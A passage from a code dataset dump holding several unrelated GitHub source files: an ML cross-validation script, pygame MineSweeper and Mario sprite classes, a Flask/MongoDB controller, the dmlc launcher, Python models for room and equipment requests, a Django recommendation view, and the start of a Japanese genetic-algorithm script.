df[' shares'].ravel()\n\ndata_norm = StandardScaler().fit_transform(data)\n\n\n\n\n\nnetwork = architectures.mixture_of_experts([\n layers.join(\n layers.Input(58),\n layers.Softmax(22),\n layers.Softmax(1),\n ),\n layers.join(\n layers.Input(58),\n layers.Relu(60),\n layers.Relu(40),\n layers.Softmax(22),\n layers.Softmax(1),\n ),\n layers.join(\n layers.Input(58),\n layers.Tanh(12),\n layers.Tanh(25),\n layers.Tanh(1),\n ),\n])\nnetwork\ngdnet = algorithms.Adam(network, verbose=True)\ngdnet.fit(data_norm,target, epochs=500)\n\npredicted = cross_val_predict(gdnet, data_norm, target, cv=5)\n\n\n\nerror = estimators.rmse(target, predicted)\n\nprint(\"MOE RMSE = {}\\n\".format(error))\n\nr2_score = metrics.r2_score(target, predicted)\n\nprint(\"MOE R_SCORE = {}\\n\".format(r2_score))\n\n\n","repo_name":"yupm/KE5206","sub_path":"cross_val_en.py","file_name":"cross_val_en.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2573583513","text":"from src.config import *\n\n\n# The base class of all objects.\nclass Element:\n\n def __init__(self, x=5, y=5, width=Sys.BLO_WID, height=Sys.BLO_WID, is_activated=True):\n self.x = x # Its top-left corner.\n self.y = y\n self.width = width\n self.height = height\n self.index = -32768\n self.collider = pygame.Rect(self.x, self.y, self.width, self.height)\n self.is_activated = is_activated # True iff the mouse has clicked on it.\n self.is_suspended = False # True iff the mouse is suspending on it.\n self.is_switched = False # True iff it is on used.\n self.is_held_left = False # True iff the left mouse is downing on it.\n self.is_released_left = False # True iff the left mouse releases it.\n self.is_held_right = False # True iff the right mouse is downing on it.\n self.is_released_right = False # True iff the right mouse releases it.\n self.TEXT = None\n # print(str(self.index), \"has been created.\")\n\n def update(self):\n if self.is_activated:\n self.display()\n self.switch_handler()\n self.is_suspended = self.mouse_handler(Sys.mouse_current)\n self.is_held_left = self.mouse_handler(Sys.left_down)\n self.is_released_left = self.mouse_handler(Sys.left_release)\n self.is_held_right = self.mouse_handler(Sys.right_down)\n self.is_released_right = self.mouse_handler(Sys.right_release)\n\n def mouse_handler(self, condition: list) -> int: # -> bool\n # return self.x < condition_list[0] < self.x + self.width and self.y < condition_list[1] < self.y + self.height\n return self.collider.collidepoint(condition)\n\n def switch_handler(self):\n if self.is_held_left and self.is_released_left:\n self.is_switched = not self.is_switched\n\n def display(self):\n pygame.draw.rect(Sys.main_screen, Color.DDDGREY, self.collider, 0)\n\n def block_skin(self):\n if not self.is_switched:\n if self.is_suspended:\n pygame.draw.rect(Sys.main_screen, Color.LDDDGREY, (self.x + 3, self.y + 1, self.width - 4, self.height - 2), 0)\n pygame.draw.rect(Sys.main_screen, Color.DGREY, (self.x + 1, self.y + 1, self.width - 4, self.height - 4), 0)\n pygame.draw.rect(Sys.main_screen, Color.LDDGREY, (self.x + 3, self.y + 3, self.width - 6, self.height - 6), 0)\n else:\n pygame.draw.rect(Sys.main_screen, Color.DDGREY, (self.x + 3, self.y + 1, self.width - 4, self.height - 2), 0)\n pygame.draw.rect(Sys.main_screen, Color.GREY, (self.x + 1, self.y + 1, self.width - 4, self.height - 4), 0)\n pygame.draw.rect(Sys.main_screen, Color.DGREY, (self.x + 3, self.y + 3, self.width - 6, self.height - 6), 0)\n else:\n pygame.draw.rect(Sys.main_screen, Color.GREY, (self.x + 1, self.y + 1, self.width - 2, self.height - 2), 0)\n","repo_name":"LuzeBillan/MineSweeper","sub_path":"src/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1508367723","text":"import pygame\nfrom settings import *\nfrom abstractSprites import Object\nfrom animationSprites import CoinAnimation\n\n\nclass PipeTop(Object):\n def __init__(self, game, x, y, name=\"platform\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, pipe_top_path, name)\n \nclass PipeMiddle(Object):\n def __init__(self, game, x, y, name=\"pipe_top\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, pipe_middle_path, name)\n \nclass Ground(Object):\n def __init__(self, game, x, y, name=\"pipe_middle\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, floor_path, name)\n\nclass Brick(Object):\n def __init__(self, game, x, y, name=\"platform\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, brick_path, name)\n self.hit = False\n self.animation_count = 0\n self.time = 16\n self.speed = 1\n self.y = y\n def update(self):\n self.rect.y+=3\n \n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n self.hit = True\n\n if self.hit:\n self.game.bump_audio.play()\n if self.animation_count <= self.time/2:\n self.rect.y -= self.speed\n elif self.animation_count > self.time/2:\n self.rect.y += self.speed\n \n if self.animation_count == self.time:\n self.animation_count = 0\n self.hit = False\n self.y_vel = 0 \n self.rect.y = self.y + 3 \n self.animation_count += 1\n \n self.rect.y-=3\n \n\nclass Stair(Object):\n def __init__(self, game, x, y, name=\"stair_block\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, stair_block_path, name)\n \nclass Flag(Object):\n def __init__(self, game, x, y, name=\"flag\"):\n groups = [game.all_sprites]\n super().__init__(game, x, y, groups, flag_path, name)\n self.rect.y -= self.image.get_height()-BLOCK_SIZE\n\n \n\n\nclass MysteryBox(Object):\n ANIMATION_DELAY = 15\n \n def __init__(self, game, x, y, name=\"Mystery Box\"):\n groups = [game.all_sprites, game.walls, game.mystery_boxes]\n super().__init__(game, x, y, groups, question_mark_block_path, name)\n self.gotten = False\n self.gotten_image = pygame.image.load(question_mark_block_gotten_path).convert_alpha()\n self.gotten_image = pygame.transform.scale2x(self.gotten_image)\n \n self.question_mark_block = pygame.image.load(question_mark_block_path).convert_alpha()\n self.question_mark_block = pygame.transform.scale2x(self.question_mark_block)\n \n self.question_mark_block_2 = pygame.image.load(question_mark_block_2_path).convert_alpha()\n self.question_mark_block_2 = pygame.transform.scale2x(self.question_mark_block_2)\n \n self.question_mark_block_3 = pygame.image.load(question_mark_block_3_path).convert_alpha()\n self.question_mark_block_3 = pygame.transform.scale2x(self.question_mark_block_3)\n \n \n self.sprites = [self.question_mark_block,\n self.question_mark_block_2,\n self.question_mark_block_3]\n \n self.animation_count = 0\n self.bounce = False\n self.y = y\n def update(self):\n self.rect.y+=3\n if self.gotten == False:\n \n sprite_index = (self.animation_count // self.ANIMATION_DELAY) % len(self.sprites)\n self.image = self.sprites[sprite_index]\n if self.animation_count >= self.ANIMATION_DELAY * len(self.sprites)*5:\n self.animation_count = 0\n self.animation_count += 1\n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n CoinAnimation(self.game, self.rect.x,self.rect.y)\n self.game.coin_audio.play()\n self.game.coin_count += 1\n self.game.score += 200\n self.gotten = True\n self.bounce = True\n self.speed = 2\n self.image = self.gotten_image\n self.animation_count = 0\n else:\n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n self.game.bump_audio.play()\n \n if self.bounce:\n if self.animation_count <= 4:\n self.rect.y -= self.speed\n elif self.animation_count > 4:\n self.rect.y += self.speed\n \n if self.animation_count == 8:\n self.bounce = False\n self.animation_count = 0\n self.rect.y = self.y + 3 \n self.animation_count += 1 \n\n self.rect.y-=3\n \n \n\n ","repo_name":"eliyahumasinter/Mario","sub_path":"blockSprites.py","file_name":"blockSprites.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70885006242","text":"import connexion\nimport six\nfrom pymongo import MongoClient\nfrom flask import jsonify\n\nfrom swagger_server.models.successfull3 import Successfull3 # noqa: E501\nfrom swagger_server import util\n\ndef existing_metadata(post_data):\n new_data = {}\n load_data_time = post_data.get('load_data_time', None)\n if load_data_time:\n new_data['load_data_time'] = load_data_time\n file_size = post_data.get('file_size', None)\n if file_size:\n new_data['file_size'] = file_size\n\n file_size_pixels = post_data.get('file_size_pixels', None)\n if file_size_pixels:\n new_data['file_size_pixels'] = file_size_pixels\n\n geolocation = post_data.get('geolocation', None)\n if geolocation:\n new_data['geolocation'] = geolocation\n\n user_id = post_data.get('user_id', None)\n if user_id:\n new_data['user_id'] = user_id\n\n file_format = post_data.get('file_format', None)\n if file_format:\n new_data['file_format'] = file_format\n return new_data\n\ndef get_metadata_post(post_id): # noqa: E501\n \"\"\"Get metadata post\n\n API to get the metadata of the post # noqa: E501\n\n :param post_id: Post id\n :type post_id: str\n\n :rtype: Successfull3\n \"\"\"\n client = MongoClient('localhost', 27017)\n db = client.database\n posts = db.posts\n post_data = posts.find_one({'post_id': int(post_id)})\n if post_data:\n post_data = existing_metadata(post_data)\n post_data['result'] = True\n del posts\n del db\n del client\n return jsonify(post_data), 201\n del posts\n del db\n del client\n return jsonify({'result': False}), 501\n\n\n\n\n\n\n\n","repo_name":"ASurtaev/SummerSberPractice","sub_path":"swagger_server/controllers/get_metadata_post_controller.py","file_name":"get_metadata_post_controller.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71586343841","text":"#!/usr/bin/env python3\n# pylint: disable=invalid-name\n\"\"\"The container launcher script that launches DMLC with the right env variable.\"\"\"\nfrom __future__ import absolute_import\n\nimport glob\nimport sys\nimport os\nimport subprocess\nfrom .util import py_str\n\ndef unzip_archives(ar_list, env):\n for fname in ar_list:\n if not os.path.exists(fname):\n continue\n if fname.endswith('.zip'):\n subprocess.call(args=['unzip', fname], env=env)\n elif fname.find('.tar') != -1:\n subprocess.call(args=['tar', '-xf', fname], env=env)\n\ndef main():\n \"\"\"Main moduke of the launcher.\"\"\"\n if len(sys.argv) < 2:\n print('Usage: launcher.py your command')\n sys.exit(0)\n\n hadoop_home = os.getenv('HADOOP_HOME')\n hdfs_home = os.getenv('HADOOP_HDFS_HOME')\n java_home = os.getenv('JAVA_HOME')\n hadoop_home = os.getenv('HADOOP_PREFIX') if hadoop_home is None else hadoop_home\n cluster = os.getenv('DMLC_JOB_CLUSTER')\n\n assert cluster is not None, 'need to have DMLC_JOB_CLUSTER'\n\n env = os.environ.copy()\n library_path = ['./']\n class_path = []\n\n if cluster == 'yarn':\n assert hadoop_home is not None, 'need to set HADOOP_HOME'\n assert hdfs_home is not None, 'need to set HADOOP_HDFS_HOME'\n assert java_home is not None, 'need to set JAVA_HOME'\n\n if cluster == 'sge':\n num_worker = int(env['DMLC_NUM_WORKER'])\n task_id = int(env['DMLC_TASK_ID'])\n if task_id < num_worker:\n env['DMLC_ROLE'] = 'worker'\n else:\n env['DMLC_ROLE'] = 'server'\n\n if hadoop_home:\n library_path.append('%s/lib/native' % hdfs_home)\n library_path.append('%s/lib' % hdfs_home)\n (classpath, _) = subprocess.Popen('%s/bin/hadoop classpath' % hadoop_home,\n stdout=subprocess.PIPE, shell=True,\n env=os.environ).communicate()\n classpath = py_str(class_path)\n for f in classpath.split(':'):\n class_path += glob.glob(f)\n\n if java_home:\n library_path.append('%s/jre/lib/amd64/server' % java_home)\n\n env['CLASSPATH'] = '${CLASSPATH}:' + (':'.join(class_path))\n\n # setup hdfs options\n if 'DMLC_HDFS_OPTS' in env:\n env['LIBHDFS_OPTS'] = env['DMLC_HDFS_OPTS']\n elif 'LIBHDFS_OPTS' not in env:\n env['LIBHDFS_OPTS'] = '--Xmx128m'\n\n LD_LIBRARY_PATH = env['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in env else ''\n env['LD_LIBRARY_PATH'] = LD_LIBRARY_PATH + ':' + ':'.join(library_path)\n\n # unzip the archives.\n if 'DMLC_JOB_ARCHIVES' in env:\n unzip_archives(env['DMLC_JOB_ARCHIVES'].split(':'), env)\n\n ret = subprocess.call(args=sys.argv[1:], env=env)\n sys.exit(ret)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dmlc/dmlc-core","sub_path":"tracker/dmlc_tracker/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":854,"dataset":"github-code","pt":"54"} +{"seq_id":"8091900624","text":"from datetime import datetime\n\nfrom flask_login import current_user\n\nfrom app import db, fuso_horario\nfrom app.models.status import Status\n\n# Classe para as solicitações de equipamentos e salas\nclass Solicitacao(db.Model):\n __tablename__ = 'solicitacoes'\n __table_args__ = {'extend_existing': True}\n \n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Enum(Status), default=Status.ABERTO.name)\n data_abertura = db.Column(db.DateTime, nullable=False, \n default=datetime.now().astimezone(fuso_horario))\n data_inicio_pref = db.Column(db.Date, nullable=False)\n data_fim_pref = db.Column(db.Date, nullable=False)\n data_retirada = db.Column(db.DateTime, nullable=True)\n data_devolucao = db.Column(db.DateTime, nullable=True)\n data_cancelamento = db.Column(db.DateTime, nullable=True)\n data_finalizacao = db.Column(db.DateTime, nullable=True)\n quantidade = db.Column(db.Integer, nullable=False, default=0)\n descricao = db.Column(db.String(20), nullable=False)\n tipo = db.Column(db.String(20), nullable=False)\n ativo = db.Column(db.Boolean, nullable=False, default=True)\n\n # Uma solicitação está associada a um usuário e um turno\n usuario_id = db.Column(db.Integer, db.ForeignKey('usuarios.id'), \n nullable=False)\n turno_id = db.Column(db.Integer, db.ForeignKey('turnos.id'), \n nullable=False)\n \n turno = db.relationship('Turno', back_populates='solicitacoes')\n\n __mapper_args__ = {\n 'polymorphic_identity': 'SOLICITACAO',\n 'polymorphic_on': tipo\n }\n \n def __repr__(self):\n return f\"Solicitação #{self.id} - {self.tipo} - {self.status.value}\"\n \n # Recupera todas as solicitações presentes no banco de dados\n def recuperar_tudo():\n return Solicitacao.query.filter_by(ativo=True).all()\n \n # Recupera todas as solicitações de um autor\n def recuperar_tudo_usuario(usuario):\n return Solicitacao.query.filter_by(autor=usuario).filter_by(ativo=True).all()\n \n # Recupera a solicitação pela ID e retorna erro 404 caso contrário\n def recuperar_id(sol_id):\n return Solicitacao.query.filter_by(id=sol_id).filter_by(ativo=True).first_or_404()\n \n # Recupera todas as solicitações em aberto no banco de dados\n def recuperar_aberto():\n return Solicitacao.query.filter_by(status='ABERTO').filter_by(ativo=True).all()\n \n # Recupera todas as solicitações em uso no banco de dados\n def recuperar_em_uso():\n return Solicitacao.query.filter_by(status='EMUSO').filter_by(ativo=True).all()\n \n # Recupera todas as solicitações pendentes de um usuário\n def recuperar_pendente_autor(usuario):\n return Solicitacao.query.filter_by(status='PENDENTE').filter_by(\n autor=usuario).filter_by(ativo=True).all()\n \n # Recupera as últimas solicitações de um usuário específico\n def recuperar_ultimas_autor(usuario, limite):\n return Solicitacao.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(Solicitacao.id.desc()).limit(limite)\n \n # Recupera as últimas solicitações de um equipamento específico\n def recuperar_ultimas_eqp(equipamento, limite):\n return SolicitacaoEquipamento.query.filter(\n SolicitacaoEquipamento.equipamentos.contains(equipamento)).filter_by(\n ativo=True).order_by(SolicitacaoEquipamento.id.desc()).limit(limite)\n \n # Recupera as últimas solicitações de um usuário específico\n def recuperar_ultimas_sala(sala, limite):\n return SolicitacaoSala.query.filter(\n SolicitacaoSala.salas.contains(sala)).filter_by(\n ativo=True).order_by(SolicitacaoSala.id.desc()).limit(limite)\n \n # Retorna o tempo restante para a solicitação entrar em atraso\n def tempo_restante(self):\n if(self.data_devolucao and self.status.name == 'EMUSO'):\n agora = datetime.now().astimezone(fuso_horario)\n tempo_restante = int(datetime.timestamp(self.data_devolucao) - \n datetime.timestamp(agora))\n if tempo_restante <= 0:\n return None\n minutos, segundos = divmod(tempo_restante, 60)\n horas, minutos = divmod(minutos, 60)\n dias, horas = divmod(horas, 24)\n return \"%01dd, %01dh, %01dmin\" % (dias, horas, minutos)\n else:\n return None\n\n # Verifica se uma solicitação está marcada para o dia atual\n def verificar_inicio_hoje(data_inicio_pref):\n if data_inicio_pref == datetime.now().astimezone(fuso_horario).date():\n return True\n else:\n return False\n\n # Verifica se uma solicitação tem como autor um determinado usuário\n def verificar_autor(self, usuario):\n if self.autor == usuario or usuario.tipo.name == 'ADMIN':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Aberto'\n def verificar_aberto(self):\n if self.status.name == 'ABERTO' or self.status.name == 'SOLICITADO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Confirmado'\n def verificar_confirmado(self):\n if self.status.name == 'CONFIRMADO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Em Uso' \n def verificar_em_uso(self):\n if self.status.name == 'EMUSO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Pendente'\n def verificar_pendente(self):\n if self.status.name == 'PENDENTE':\n return True\n else:\n return False\n \n # Verifica se uma solicitação ultrapassou a data de devolução\n def verificar_atraso(self):\n if (datetime.now().astimezone(fuso_horario) > \n self.data_devolucao.astimezone(fuso_horario)):\n return True\n else:\n return False\n \n # Insere a solicitação no banco de dados\n def inserir(self):\n db.session.add(self)\n db.session.commit()\n return\n \n # Atualiza o status de um solicitação para 'Solicitado'\n def solicitado(self):\n self.status = 'SOLICITADO' \n db.session.commit() \n \n # Atualiza o status de um solicitação para 'Confirmado'\n def confirmar(self):\n self.status = 'CONFIRMADO' \n db.session.commit() \n \n # Atualiza o status de um solicitação para 'Em Uso'\n def entregar(self, lista_itens, form):\n self.status = 'EMUSO'\n self.data_retirada = datetime.now().astimezone(fuso_horario)\n # Combina data de devolução com o horário final do turno\n self.data_devolucao = datetime.combine(form.data_devolucao.data, \n self.turno.hora_fim)\n if self.tipo == 'EQUIPAMENTO':\n self.equipamentos = lista_itens\n for equipamento in self.equipamentos:\n equipamento.status = 'EMUSO'\n if self.tipo == 'SALA':\n self.salas = lista_itens\n for sala in self.salas: \n sala.status = 'EMUSO'\n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Pendente'\n def pendente(self):\n self.status = 'PENDENTE'\n if self.tipo == 'EQUIPAMENTO':\n for equipamento in self.equipamentos:\n equipamento.status = 'PENDENTE'\n if self.tipo == 'SALA':\n for sala in self.salas:\n sala.status = 'PENDENTE' \n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Finalizado' \n def finalizar(self):\n self.status = 'FECHADO'\n self.data_finalizacao = datetime.now().astimezone(fuso_horario)\n if self.tipo == 'EQUIPAMENTO':\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.tipo == 'SALA':\n for sala in self.salas:\n sala.status = 'ABERTO'\n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Cancelado' \n def cancelar(self):\n if self.status != 'ABERTO' and self.status != 'SOLICITADO':\n if self.tipo == 'EQUIPAMENTO':\n if self.equipamentos:\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.tipo == 'SALA':\n if self.salas:\n for sala in self.salas:\n sala.status = 'ABERTO' \n self.status = 'CANCELADO'\n self.data_cancelamento = datetime.now().astimezone(fuso_horario)\n db.session.commit()\n \n # Desativa o registro de uma solicitação no banco de dados\n def excluir(self):\n # Atualiza o status de equipamentos e salas antes de exluir a solicitação\n if self.status.name == 'CONFIRMADO':\n if self.equipamentos:\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.salas:\n for sala in self.salas:\n sala.status = 'ABERTO'\n self.status = 'FECHADO'\n self.ativo = False\n db.session.commit()\n \n# Tabela que associa as solicitações às salas\nsolicitacao_s = db.Table('solicitacao_s',\n db.Column('solicitacao_sala_id', db.Integer, db.ForeignKey('solicitacoes_salas.id'), \n primary_key=True),\n db.Column('sala_id', db.Integer, db.ForeignKey('salas.id'), \n primary_key=True)\n)\n\n# Tabela que associam as solicitações aos equipamentos\nsolicitacao_e = db.Table('solicitacao_e',\n db.Column('solicitacao_equipamento_id', db.Integer, db.ForeignKey('solicitacoes_equipamentos.id'), \n primary_key=True),\n db.Column('equipamento_id', db.Integer, db.ForeignKey('equipamentos.id'), \n primary_key=True)\n)\n\n# Classe específica para as solicitações de salas\nclass SolicitacaoSala(Solicitacao):\n __tablename__ = 'solicitacoes_salas'\n \n id = db.Column(db.Integer, db.ForeignKey('solicitacoes.id'), primary_key=True)\n\n setor_id = db.Column(db.Integer, db.ForeignKey('setores.id'), nullable=False)\n \n # Pode estar associada a múltiplas salas de um único setor\n setor = db.relationship('Setor', back_populates='solicitacoes')\n salas = db.relationship('Sala', secondary= solicitacao_s, \n back_populates='solicitacoes')\n \n __mapper_args__ = {\n 'polymorphic_identity': 'SALA',\n }\n \n # Verifica se o usuário já possui uma solicitação não finalizada\n def verificar_existente_usuario(usuario):\n solicitacao = SolicitacaoSala.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(SolicitacaoSala.id.desc()).first()\n if solicitacao:\n if (solicitacao.status.name != 'CANCELADO' and \n solicitacao.status.name != 'FECHADO'):\n return True\n return False\n \n # Cria uma nova solitação de equipamento para ser inserida\n def criar(status, form):\n return SolicitacaoSala(turno_id=form.turno.data,\n usuario_id=current_user.id,\n descricao=form.descricao.data,\n quantidade=form.qtd_preferencia.data,\n setor_id=form.setor.data,\n data_inicio_pref=form.data_inicio_pref.data,\n data_fim_pref=form.data_fim_pref.data,\n status=status)\n \n def inserir(self):\n return super().inserir()\n \n\n# Classe específica para as solicitações de equipamentos\nclass SolicitacaoEquipamento(Solicitacao):\n __tablename__ = 'solicitacoes_equipamentos'\n \n id = db.Column(db.Integer, db.ForeignKey('solicitacoes.id'), primary_key=True)\n\n tipo_eqp_id = db.Column(db.Integer, db.ForeignKey('tipos_equipamento.id'), \n nullable=True)\n \n # Pode estar associada a múltiplos equipamentos de um único tipo\n equipamentos = db.relationship('Equipamento', secondary=solicitacao_e, \n back_populates='solicitacoes')\n tipo_eqp = db.relationship('TipoEquipamento', back_populates='solicitacoes')\n\n __mapper_args__ = {\n 'polymorphic_identity': 'EQUIPAMENTO'\n }\n \n # Verifica se o usuário já possui uma solicitação não finalizada\n def verificar_existente_usuario(usuario):\n solicitacao = SolicitacaoEquipamento.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(SolicitacaoEquipamento.id.desc()).first()\n if solicitacao:\n if (solicitacao.status.name != 'CANCELADO' and \n solicitacao.status.name != 'FECHADO'):\n return True\n return False\n \n # Cria uma nova solitação de sala para ser inserida\n def criar(status, form):\n return SolicitacaoEquipamento(tipo_eqp_id=form.tipo_equipamento.data,\n turno_id=form.turno.data,\n usuario_id=current_user.id,\n descricao=form.descricao.data,\n quantidade=form.qtd_preferencia.data,\n data_inicio_pref=form.data_inicio_pref.data,\n data_fim_pref=form.data_fim_pref.data,\n status=status) \n \n def inserir(self):\n return super().inserir()\n \n\n# Classe para os turnos possíveis para solicitações\nclass Turno(db.Model):\n __tablename__ = 'turnos'\n __table_args__ = {'extend_existing': True}\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20), unique=True, nullable=False)\n hora_inicio = db.Column(db.Time, nullable=False)\n hora_fim = db.Column(db.Time, nullable=False)\n ativo = db.Column(db.Boolean, nullable=False, default=True)\n\n # Um turno pode estar associado a múltiplas solicitações\n solicitacoes = db.relationship('Solicitacao', back_populates='turno')\n \n def __repr__(self):\n return f\"{self.name} ({self.hora_inicio} ~ {self.hora_fim})\"\n \n def recuperar_tudo():\n return Turno.query.filter_by(ativo=True).all()\n \n def recuperar_id(turno_id):\n return Turno.query.filter_by(id=turno_id).filter_by(ativo=True).first_or_404()\n \n def criar(form):\n return Turno(name=form.nome.data, \n hora_inicio=form.hora_inicio.data, \n hora_fim=form.hora_fim.data)\n \n def inserir(self):\n db.session.add(self)\n db.session.commit()\n ","repo_name":"DWNeo/UniGerencia","sub_path":"app/models/solicitacoes.py","file_name":"solicitacoes.py","file_ext":"py","file_size_in_byte":15045,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7404371593","text":"import json\n\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.views import View\n\nfrom recommendation.models import Recommendation\nfrom recommendation.sparql_queries import query_common_p_o, query_most_common_p_s, common_instance_of\nfrom topics.models import Course, Learner_Course_Record, UserProfile\n\n\nclass RecommendationView(View):\n def get(self, request):\n courses = Learner_Course_Record.objects.filter(learner__user=request.user)\n\n taken_courses = [course.course.id for course in courses]\n recommendations = Recommendation.objects.filter(user=request.user, version=1).exclude(course__in=taken_courses).order_by(\"-rating\")[:10]\n rec_courses = [recommendation.course for recommendation in recommendations]\n if not rec_courses:\n rec_courses = Course.objects.filter(published=True).exclude(id__in=taken_courses).exclude(teacher=request.user).order_by(\"-pubdate\")\n\n return render(request, 'recommendation/recommendation.html', {\"courses\": rec_courses})\n\n\n\"\"\"\nclass Recommendation(View):\n def get(self, request):\n courses = Learner_Course_Record.objects.filter(learner__user=request.user)\n\n taken_courses = [course.course.id for course in courses]\n\n labels = [label.identifier for course in courses for label in course.course.glossary_set.all()]\n\n from collections import Counter\n\n labels_count = Counter(labels)\n\n rec = {}\n for label in labels_count:\n c = Course.objects.filter(glossary__identifier=label).exclude(id__in=taken_courses).exclude(teacher=request.user)\n for course in c:\n if course.id in rec:\n rec[course.id] += labels_count[label]\n else:\n rec[course.id] = labels_count[label]\n sorted_rec = sorted(rec.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n rec_courses = []\n for s in sorted_rec:\n rec_courses.append(Course.objects.get(id=s[0]))\n if len(rec_courses) > 4:\n break\n\n return render(request, 'recommendation/recommendation.html', {\"courses\": rec_courses})\n\"\"\"\n\n\nclass Recommendation_deneme(View):\n def get(self, request, *args, **kwargs):\n user = request.user\n pk = self.kwargs.get(\"pk\")\n courses = Learner_Course_Record.objects.filter(learner__user=user)\n\n taken_courses = [course.course.id for course in courses]\n\n labels = [label.identifier for course in courses for label in course.course.glossary_set.all()]\n labels_name = [label.name for course in courses for label in course.course.glossary_set.all()]\n course_labels = {}\n course = Course.objects.get(pk=pk)\n\n c_labels = [label.identifier for label in course.glossary_set.all()]\n c_labels_name = [label.name for label in course.glossary_set.all()]\n course_labels[course.id] = c_labels\n rating = {\"labels\": labels_name, course.title: c_labels_name}\n for course in course_labels:\n r = query_common_p_o(labels, course_labels[course])\n rating[\"query_common_p_o\"] = r\n rating[\"c_p_o\"] = 0\n if r:\n rating[\"c_p_o\"] = r['ocount_ratio'] + r['pcount_ratio'] + r['scount_ratio']\n q = query_most_common_p_s(labels, course_labels[course])\n\n rating[\"query_most_common_p_s\"] = q\n rating[\"c_p_s\"] = 0\n if q:\n rating[\"c_p_s\"] = q['ocount_ratio'] + q['pcount_ratio'] + q['scount_ratio']\n\n s = common_instance_of(labels, course_labels[course])\n\n rating[\"common_instance_of\"] = s\n rating[\"c_i\"] = 0\n if s:\n rating[\"c_i\"] = s['ratio']\n print(user, course, rating)\n ratingT = rating[\"c_p_o\"] + rating[\"c_p_s\"] + rating[\"c_i\"]\n rating[\"rating\"] = ratingT\n return render(request, 'recommendation/recommendation.html', {\"courses\": {}, \"rating\": json.dumps(rating)})\n","repo_name":"kasimbozdag/swe_574","sub_path":"ocial/ocial_project/recommendation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25304134682","text":"#! cat input | python3 main.py\nfrom random import random\nfrom random import randint\n\nPOP_SIZE = 50 #/* 個体数 (必ず奇数に設定) */\nG_LENGTH = 10 #/* 個体の遺伝子型のビット数 */ \nMAX_GEN = 20 #/* 世代数 */\nM_RATE = 0.1 #/* 突然変異率 (0〜1) */ \n\n\n#/********************************************************************\n# 遺伝子の初期化\t\t\n# 引�� gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n#********************************************************************/\ndef init_gene(gene):\n# /* 遺伝子を初期化 0〜1の乱数を発生し、0.5以上なら1 \n# 0.5未満なら0 */\n print(\"<< 初期個体群 >>\");\n return [[random() >= 0.5 and 1 or 0 for i in p] for p in gene]\n\n\n#/********************************************************************\n# 適応度の計算\n# 引数 gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#********************************************************************/\ndef calc_fitness(gene, fitness):\n for p, row in enumerate(gene):\n# /* 適応度の計算 前半の5bitは0の数 後半の5bitは1の数 */\n n0 = row[:G_LENGTH//2].count(0)\n n1 = row[G_LENGTH//2:].count(1)\n fitness[p] = n0 + n1\n\n\n#/**********************************************************************\n# 遺伝子の表示 & 最大適応度・平均適応度の計算\n# 引数 t : 世代数\n# gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#**********************************************************************/\ndef show_gene(t, gene, fitness):\n# /* 個体の値、適応度の表示 */\n # for g in gene: print(\"gene:\", g)\n # print(\"fitness:\", fitness)\n\n# /* 平均・最大適応度の計算 */\n avg_fit = sum(fitness) / len(fitness)\n max_fit = max(fitness)\n\n# /* 平均・最大適応度の表示 */\n print(\"平均適応度 : %lf\" % avg_fit);\n print(\"最大適応度 : %lf\" % max_fit);\n print()\n\n\n#/**********************************************************************\n# 個体番号 p1 と p2 の適応度と遺伝子を交換\n# 引数 p1, p2 : 遺伝子の番号\n# gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#**********************************************************************/\ndef swap_gene(p1, p2, gene, fitness):\n# /* 遺伝子型の交換 (遺伝子p1と遺伝子p2の値を入れ替える) */\n gene[p1], gene[p2] = gene[p2], gene[p1]\n\n# /* 適応度の交換 